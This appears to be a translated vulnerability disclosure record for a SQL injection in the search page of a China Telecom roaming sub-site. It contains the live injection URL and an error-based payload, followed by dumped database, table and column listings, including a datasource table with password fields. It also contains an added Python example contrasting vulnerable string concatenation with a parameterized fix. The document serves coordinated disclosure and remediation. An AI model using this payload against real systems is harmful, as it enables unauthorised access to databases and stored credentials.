Vulnerability Summary
Followers: 24
Title: SQL injection vulnerability on a China Telecom sub-site
Submitted: 2014-07-23 17:48
Fixed: 2014-09-06 17:52
Published: 2014-09-06 17:52
Vulnerability type: SQL injection
Severity: Medium
Self-assessed Rank: 10
Status: handed to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling
Tags: none
Vulnerability details / disclosure status:
2014-07-23: Details sent to the vendor, awaiting the vendor's response
2014-07-28: Vendor confirmed; details disclosed to the vendor only
2014-08-07: Details disclosed to core white hats and experts in the relevant field
2014-08-17: Details disclosed to regular white hats
2014-08-27: Details disclosed to intern white hats
2014-09-06: Details disclosed to the public
Brief description: see title
Detailed description: an injection vulnerability in the search function of China Telecom International Roaming. Enter 1' (with a trailing single quote) in the search box and the request fails with an error. The key information in the response is:
org.springframework.web.util.NestedServletException: Request processing failed; nested exception is org.springframework.jdbc.BadSqlGrammarException: StatementCallback; bad SQL grammar [select count(*) from (select * from T_LUCENE_RELATEDKEYWORDS a WHERE upper(a.keyName) like '%1'%' and a.isValid=1 order by orders desc) t]; nested exception is java.sql.SQLException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' and a.isValid=1 order by orders desc) t' at line 1
    org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:656)
    org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:549)
    javax.servlet.http.HttpServlet.service(HttpServlet.java:617)
    javax.servlet.http.HttpServlet.service(HttpServlet.java:717)
The search term is concatenated straight into the SQL statement. An injection point:
http://manyou.189.cn/search//front/search.do?key=1&className=%E8%87%AA%E5%8A%A9%E6%9C%8D%E5%8A%A1
payload: key=1' AND (SELECT 3497 FROM(SELECT COUNT(*),CONCAT(CHAR(58,101,113,102,58),(SELECT (CASE WHEN (3497=3497) THEN 1 ELSE 0 END)),CHAR(58,100,101,98,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'eDxm'='eDxm&className=自助服务
Injection results:
available databases [3]:
[*] information_schema
[*] jsearch
[*] manyouideal

Database: manyouideal
[1 table]
+--------------+
| km_gm_common |
+--------------+

Database: manyouideal
Table: km_gm_common
[42 columns]
+--------------------+---------------+
| Column             | Type          |
+--------------------+---------------+
| CALL_CHINA_NO_HK   | varchar(1000) |
| CALL_NATIVE        | varchar(1000) |
| CALL_OTHER_COUNTRY | varchar(800)  |
| CARDTYPE           | varchar(1000) |
| CARDTYPESORT       | int(11)       |
| CDMA1X             | varchar(500)  |
| CITY               | varchar(1000) |
| CONSULATE_PHONE    | varchar(500)  |
| COUNTRY            | varchar(1000) |
| COUNTRY_AREA       | varchar(500)  |
| COUNTRY_CODE       | varchar(500)  |
| COUNTRY_NAME_EN    | varchar(500)  |
| EMBASSY_PHONE      | varchar(500)  |
| EMERGENCY_PHONE    | varchar(500)  |
| FREQUENCY_RANGE    | varchar(500)  |
| GPRS               | varchar(500)  |
| HEAD_133           | varchar(800)  |
| ID                 | int(11)       |
| IDCODE             | varchar(50)   |
| INTERNET           | varchar(300)  |
| JIANPIN            | varchar(50)   |
| MIFI               | varchar(300)  |
| MSG_CHAR_LIMIT     | varchar(500)  |
| NATIVE_MOBILEPHONE | varchar(500)  |
| NATIVE_TALK        | varchar(500)  |
| NETWORK            | varchar(1000) |
| NETWORK_DEFAULT    | varchar(500)  |
| NOTICE             | varchar(1500) |
| OLDID              | int(11)       |
| OUTLET             | varchar(100)  |
| PINYIN             | varchar(50)   |
| RECEIVE_CALL       | varchar(800)  |
| RECEIVE_CODE       | varchar(500)  |
| RECEIVE_SHORTMSG   | varchar(500)  |
| REMOTE_MOBILEPHONE | varchar(500)  |
| REMOTE_TALK        | varchar(500)  |
| SEND_CHINA_LAND    | varchar(500)  |
| SEND_OTHER_COUNTRY | varchar(500)  |
| SHORTMSG_CODE      | varchar(500)  |
| SORTNUMER          | int(11)       |
| VOLTAGE            | varchar(200)  |
| WIFI               | varchar(500)  |
+--------------------+---------------+

Database: jsearch
[25 tables]
+------------------------------+
| country                      |
| t_lucene_ad                  |
| t_lucene_class               |
| t_lucene_config              |
| t_lucene_content             |
| t_lucene_datasource          |
| t_lucene_ftpserverlist       |
| t_lucene_hotlabels           |
| t_lucene_indexlogs           |
| t_lucene_indextask           |
| t_lucene_indextask_ftpserver |
| t_lucene_keyrecovery         |
| t_lucene_keywordhits         |
| t_lucene_keywordhits_0612    |
| t_lucene_keywords            |
| t_lucene_minganci            |
| t_lucene_module              |
| t_lucene_profile             |
| t_lucene_relatedkeywords     |
| t_lucene_searchserver        |
| t_lucene_servernode          |
| t_lucene_typehits            |
| t_lucene_users               |
| t_lucene_visitlog            |
| t_lucene_weight              |
+------------------------------+
This is only search-index data, but an issue of this kind still deserves attention.
Proof of vulnerability: the columns of one of the lucene tables, as further proof.
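The root cause is visible in the query leaked by the stack trace: the search term is spliced into the LIKE pattern, so a single quote ends the string literal. The following is an added example, not code from the original report or from the affected site; it rebuilds that query shape against a constructed in-memory SQLite table named after the one in the trace (the schema and rows are assumptions, limited to the columns the leaked query references) and places the vulnerable concatenation beside a parameterized version that also escapes LIKE wildcards.

```python
import sqlite3


def make_db():
    """Constructed stand-in for T_LUCENE_RELATEDKEYWORDS (schema is an assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE T_LUCENE_RELATEDKEYWORDS (
            keyName TEXT, isValid INTEGER, orders INTEGER);
        INSERT INTO T_LUCENE_RELATEDKEYWORDS VALUES
            ('roaming 1', 1, 3), ('card 100%', 1, 2), ('hidden', 0, 1), ('other', 1, 0);
    """)
    return conn


def count_vulnerable(conn, key):
    """Same shape as the query in the BadSqlGrammarException: the user-supplied
    search term is concatenated straight into the LIKE pattern."""
    sql = ("select count(*) from (select * from T_LUCENE_RELATEDKEYWORDS a "
           "WHERE upper(a.keyName) like '%" + key + "%' and a.isValid=1 "
           "order by orders desc) t")
    return conn.execute(sql).fetchone()[0]


def escape_like(term, esc="!"):
    """Neutralise LIKE metacharacters so the term is matched literally.
    The escape character itself is doubled first so it cannot be smuggled in."""
    return (term.replace(esc, esc + esc)
                .replace("%", esc + "%")
                .replace("_", esc + "_"))


def count_parameterized(conn, key):
    """Hardened form: the whole pattern travels as a bound parameter, so a quote
    in `key` is data and can never terminate the literal; the ESCAPE clause keeps
    '%' and '_' from the user literal as well."""
    pattern = "%" + escape_like(key.upper()) + "%"
    sql = ("select count(*) from T_LUCENE_RELATEDKEYWORDS a "
           "WHERE upper(a.keyName) like ? escape '!' and a.isValid=1")
    return conn.execute(sql, (pattern,)).fetchone()[0]


def vulnerable_raises_on_quote(conn):
    """Reproduce the symptom from the report: input 1' breaks the SQL grammar."""
    try:
        count_vulnerable(conn, "1'")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, key=1        ->", count_vulnerable(db, "1"))
    print("parameterized, key=1     ->", count_parameterized(db, "1"))
    print("vulnerable breaks on 1'  ->", vulnerable_raises_on_quote(db))
    print("parameterized, key=1'    ->", count_parameterized(db, "1'"))
    print("vulnerable, key=%        ->", count_vulnerable(db, "%"))
    print("parameterized, key=%     ->", count_parameterized(db, "%"))
```

The escaping step is the part most fixes forget: binding the parameter stops the syntax error and the injection, but without ESCAPE a bare `%` or `_` in the search box still acts as a wildcard and returns every row. The same two changes apply unchanged to the Spring JdbcTemplate code behind the trace (a `?` placeholder with the pattern passed as an argument).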
Database: jsearch
Table: t_lucene_datasource
[10 columns]
+----------------+---------------+
| Column         | Type          |
+----------------+---------------+
| addDate        | timestamp     |
| content        | text          |
| dataSourceType | varchar(200)  |
| dataSql        | varchar(2000) |
| driverName     | varchar(200)  |
| id             | int(6)        |
| name           | varchar(200)  |
| password       | varchar(200)  |
| url            | varchar(500)  |
| userName       | varchar(200)  |
+----------------+---------------+
Remediation:
Vulnerability response
Vendor response:
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2014-07-28 09:35
Vendor reply: CNVD has confirmed and reproduced the reported issue; it has been forwarded by CNCERT directly to China Telecom Group, which will pass it down to the provincial company and the website's administering unit for handling.
Latest status: none